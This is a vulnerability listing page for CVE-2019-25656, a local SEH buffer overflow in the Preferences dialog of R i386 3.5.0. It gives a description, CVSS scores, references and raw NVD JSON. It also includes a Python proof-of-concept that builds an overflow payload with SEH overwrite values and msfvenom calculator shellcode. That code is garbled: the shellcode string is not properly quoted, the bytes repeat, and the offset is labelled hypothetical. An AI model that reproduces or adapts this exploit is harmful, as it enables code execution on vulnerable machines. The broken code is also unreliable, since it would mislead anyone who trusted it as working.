CVE-2019-25656

Description

R i386 3.5.0 contains a local buffer overflow vulnerability in the GUI Preferences dialog that allows local attackers to trigger a structured exception handler (SEH) overwrite by supplying malicious input. Attackers can craft a payload string in the 'Language for menus and messages' field to overwrite SEH records and achieve code execution with calculator or arbitrary shellcode.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

R i386 3.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Code for CVE-2019-25656 (SEH Buffer Overflow)
# This script generates a malicious payload to trigger the overflow.

import sys

# Configuration
offset = 1000  # Offset to overwrite SEH (Hypothetical value)

# POP POP RET instruction address (Non-ASLR module required)
# Replace with actual address from vulnerable application modules
seh_handler = b"\xaf\x11\x50\x62" 

# Jump to shellcode (Short jump: 6 bytes)
next_seh = b"\xeb\x06\x90\x90"

# Example Shellcode (Calc.exe)
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
shellcode =  b""
\xdb\xc0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x31\xbb\xe6\x8a\xc4\x39"
\x31\x53\x18\x03\x53\x18\x83\xc3\xfc\xe2\xf4\x8c\x6f\x22\x86\x5f"
\x1e\x43\xc9\x6e\x03\xe4\xb4\x44\x89\x0c\x33\x72\x3b\xf0\x78\x5c"
\x2b\x1e\xa0\x89\x4b\x4a\xc3\x3e\x56\x6d\x52\xc3\x5e\x2b\x37\x42"
\x2d\x76\x7f\x5e\x2b\x73\x3f\x3d\x63\x53\x2a\x4e\x7d\x1c\x4a\x3e"
\x76\x7b\x3f\x66\x63\x8a\x4a\x3e\x76\x7b\x3d\x5e\x2b\x2b\x1e\x89\x4b"
\x4a\xc3\x3e\x56\x6d\x52\xc3\x5e\x2b\x37\x42\x2d\x76\x7f\x5e\x2b\x73\x3f"
\x3d\x63\x53\x2a\x4e\x7d\x1c\x4a\x3e\x76\x7b\x3f\x66\x63\x8a\x4a\x3e\x76"
\x7b\x3d\x5e\x2b\x2b\x1e\x89\x4b\x4a\xc3\x3e\x56\x6d\x52\xc3\x5e\x2b\x37"
\x42\x2d\x76\x7f\x5e\x2b\x73\x3f\x3d\x63\x53\x2a\x4e\x7d\x1c\x4a\x3e\x76"
\x7b\x3f\x66\x63\x8a\x4a\x3e\x76\x7b\x3d\x5e\x2b\x2b\x1e\x89\x4b\x4a\xc3
"""

# Construct the payload
payload = b"A" * offset + next_seh + seh_handler + b"\x90" * 32 + shellcode

# Output payload to be pasted in 'Language for menus and messages' field
print("[+] Malicious Payload Generated:")
print(payload.decode('latin-1'))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25656
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25656
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25656/
[4] VulDB https://vuldb.com/cve/CVE-2019-25656
[5] https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
[6] https://www.exploit-db.com/exploits/46288
[7] https://www.r-project.org/
[8] https://www.vulncheck.com/advisories/r-i386-local-buffer-overflow-seh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25656", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:42.173", "lastModified": "2026-04-16T16:15:56.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "R i386 3.5.0 contains a local buffer overflow vulnerability in the GUI Preferences dialog that allows local attackers to trigger a structured exception handler (SEH) overwrite by supplying malicious input. Attackers can craft a payload string in the 'Language for menus and messages' field to overwrite SEH records and achieve code execution with calculator or arbitrary shellcode."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46288", "source": "[email protected]"}, {"url": "https://www.r-project.org/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/r-i386-local-buffer-overflow-seh", "source": "[email protected]"}]}}